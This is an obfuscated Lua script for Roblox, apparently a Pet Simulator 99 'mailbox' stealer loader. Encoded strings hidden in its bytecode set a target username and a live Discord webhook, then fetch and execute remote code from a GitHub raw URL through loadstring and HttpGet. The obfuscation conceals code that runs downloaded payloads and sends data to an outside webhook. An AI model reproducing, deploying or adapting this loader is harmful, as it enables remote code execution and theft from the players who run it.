--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v105=0;local v106;while true do if (v105==1) then return v106;end if (v105==0) then v106=v5(v83,v19);v19=nil;v105=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-((2202 -(226 + 1044)) -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=(1 + 1)^(v32-((3823 -2945) -(282 + (847 -252)))) ;return (((v31%(v86 + v86))>=v86) and (1638 -((1640 -(32 + 85)) + 114))) or ((1065 -(68 + 997)) + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (57 + 199)) + v36 ;end if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;v35=(1 -0) -0 ;end end end local function v23() local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(181 -(67 + 113))) then return (v42 * 16777216) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((40 -25) -11) ;v38=(1728 -775) -(802 + 150) ;end end end local function v24() local v43=v23();local v44=v23();local v45=443 -((1024 -608) + 26) ;local v46=(v20(v44,3 -2 ,9 + 11 ) * ((1 + 1 + 0)^(1029 -(915 + 82)))) + v43 ;local v47=v20(v44,59 -38 ,19 + 12 );local v48=((v20(v44,56 -24 )==(1 -0)) and  -(1188 -(1069 + 118))) or 1 ;if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (772 -(201 + 571)) ;else v47=1139 -(116 + (2102 -(1020 + 60))) ;v45=(1423 -(630 + 793)) + 0 ;end elseif (v47==(3636 -1589)) then return ((v46==(0 + 0)) and (v48 * ((792 -(368 + 150 + 273))/((885 -(261 + 624)) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/((7 -5)^(199 -147)))) ;end local function v25(v49) local v50;if  not v49 then local v87=0 -0 ;while true do if (v87==(0 -(1913 -(1789 + 124)))) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v65=1748 -(760 + 987) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==(5 -3)) then for v94=1,v23() do local v95=0;local v96;while true do if (v95==(0 + 0)) then v96=v21();if (v20(v96,575 -(507 + 67) ,1750 -(1013 + 736) )==(0 + 0)) then local v107=0 -0 ;local v108;local v109;local v110;while true do if (v107==3) then if (v20(v109,10 -7 ,3)~=(868 -(550 + 317))) then else v110[4]=v58[v110[4]];end v53[v94]=v110;break;end if (v107~=(1 -0)) then else local v118=0 -0 ;while true do if (v118==0) then v110={v22(),v22(),nil,nil};if (v108==0) then local v171=0 -0 ;local v172;while true do if (v171~=0) then else v172=1990 -(582 + 1408) ;while true do if (0~=v172) then else v110[10 -7 ]=v22();v110[4 -0 ]=v22();break;end end break;end end elseif (v108==1) then v110[3]=v23();elseif (v108==(7 -5)) then v110[3]=v23() -((1826 -(1195 + 629))^16) ;elseif (v108==(3 -0)) then local v186=0;local v187;while true do if (0==v186) then v187=0;while true do if ((241 -(187 + 54))==v187) then v110[3]=v23() -((782 -(162 + 618))^(12 + 4)) ;v110[4]=v22();break;end end break;end end end v118=1 + 0 ;end if (v118==1) then v107=3 -1 ;break;end end end if ((2 -0)==v107) then if (v20(v109,1,1)==1) then v110[1 + 1 ]=v58[v110[1638 -(1373 + 263) ]];end if (v20(v109,2,2)==(1001 -(451 + 549))) then v110[3]=v58[v110[3]];end v107=3;end if (v107~=(0 + 0)) then else local v119=0;local v120;while true do if (v119==(0 -0)) then v120=0 -0 ;while true do if (v120==0) then v108=v20(v96,2,1387 -(746 + 638) );v109=v20(v96,2 + 2 ,6);v120=1;end if (v120==(1 -0)) then v107=342 -(218 + 123) ;break;end end break;end end end end end break;end end end for v97=1,v23() do v54[v97-(1582 -(1535 + 46)) ]=v28();end return v56;end if ((1 + 0)==v52) then local v90=0;local v91;while true do if (v90==(0 + 0)) then v91=560 -(306 + 254) ;while true do if (v91~=2) then else v52=2;break;end if (v91~=(1 + 0)) then else for v112=1 -0 ,v57 do local v113=0;local v114;local v115;local v116;while true do if ((1467 -(899 + 568))==v113) then v114=0 + 0 ;v115=nil;v113=1;end if (v113~=1) then else v116=nil;while true do if (1==v114) then if (v115==1) then v116=v21()~=0 ;elseif (v115==(4 -2)) then v116=v24();elseif (v115==(606 -(268 + 335))) then v116=v25();end v58[v112]=v116;break;end if (v114~=0) then else local v169=0;local v170;while true do if (v169==(290 -(60 + 230))) then v170=572 -(426 + 146) ;while true do if (0==v170) then local v183=0 + 0 ;while true do if (1==v183) then v170=1457 -(282 + 1174) ;break;end if (0==v183) then v115=v21();v116=nil;v183=1;end end end if (v170~=(812 -(569 + 242))) then else v114=2 -1 ;break;end end break;end end end end break;end end end v56[1 + 2 ]=v21();v91=1026 -(706 + 318) ;end if (v91==0) then v57=v23();v58={};v91=1;end end break;end end end if ((1251 -(721 + 530))==v52) then local v92=0;local v93;while true do if (v92==(1271 -(945 + 326))) then v93=0 -0 ;while true do if (v93~=2) then else v52=1 + 0 ;break;end if (1~=v93) then else v55={};v56={v53,v54,nil,v55};v93=1290 -(993 + 295) ;end if ((0 + 0)~=v93) then else v53={};v54={};v93=1;end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v88=0,v75 do if (v88>=v69) then v73[v88-v69 ]=v74[v88 + 1 ];else v77[v88]=v74[v88 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v89=0;while true do if (v89==0) then v79=v67[v71];v80=v79[1];v89=1;end if (v89==1) then if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80>0) then local v121=v79[2];local v122,v123=v70(v77[v121](v13(v77,v121 + 1 ,v79[3])));v72=(v123 + v121) -1 ;local v124=0;for v152=v121,v72 do local v153=0;while true do if (v153==0) then v124=v124 + 1 ;v77[v152]=v122[v124];break;end end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=2) then v71=v79[3];elseif (v80==3) then v71=v79[3];else local v156=0;local v157;while true do if (v156==0) then v157=v79[2];v77[v157]=v77[v157](v13(v77,v157 + 1 ,v72));break;end end end elseif (v80<=6) then if (v80>5) then v61[v79[3]]=v77[v79[2]];else v77[v79[2]]();end elseif (v80<=7) then local v128=v79[2];v77[v128]=v77[v128](v13(v77,v128 + 1 ,v72));elseif (v80>8) then local v158=0;local v159;local v160;local v161;local v162;while true do if (v158==1) then v72=(v161 + v159) -1 ;v162=0;v158=2;end if (v158==0) then v159=v79[2];v160,v161=v70(v77[v159](v13(v77,v159 + 1 ,v79[3])));v158=1;end if (v158==2) then for v179=v159,v72 do v162=v162 + 1 ;v77[v179]=v160[v162];end break;end end else do return;end end elseif (v80<=14) then if (v80<=11) then if (v80>10) then v77[v79[2]]=v61[v79[3]];else local v132=v79[2];local v133=v77[v79[3]];v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4]];end elseif (v80<=12) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>13) then v77[v79[2]]=v61[v79[3]];else do return;end end elseif (v80<=16) then if (v80==15) then v61[v79[3]]=v77[v79[2]];else v77[v79[2]]=v79[3];end elseif (v80<=17) then local v141=v79[2];local v142=v77[v79[3]];v77[v141 + 1 ]=v142;v77[v141]=v142[v79[4]];elseif (v80==18) then v77[v79[2]]();else v77[v79[2]]=v79[3];end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03063O004D696E524150025O0088C340030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F50532O392F6D61696E2F6D61696C626F782E6C756103083O00557365724E616D6503073O00716F736973687303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313235342O36392O34383531303433392O34362F6E7748387365746733716A6843356D4147496C77754F38705854783576525443615051314E5934792O5439716D6F617637486373557772632D4A314F4355334C6D65375800163O0012103O00013O00264O000D000100020004023O000D0001001210000100043O00120F000100033O00120E000100053O00120E000200063O002011000200020007001210000400084O0009000200044O000400013O00022O00050001000100010004023O0015000100264O0001000100010004023O000100010012100001000A3O00120F000100093O0012100001000C3O00120F0001000B3O0012103O00023O0004023O000100012O000D3O00017O00",v9(),...);
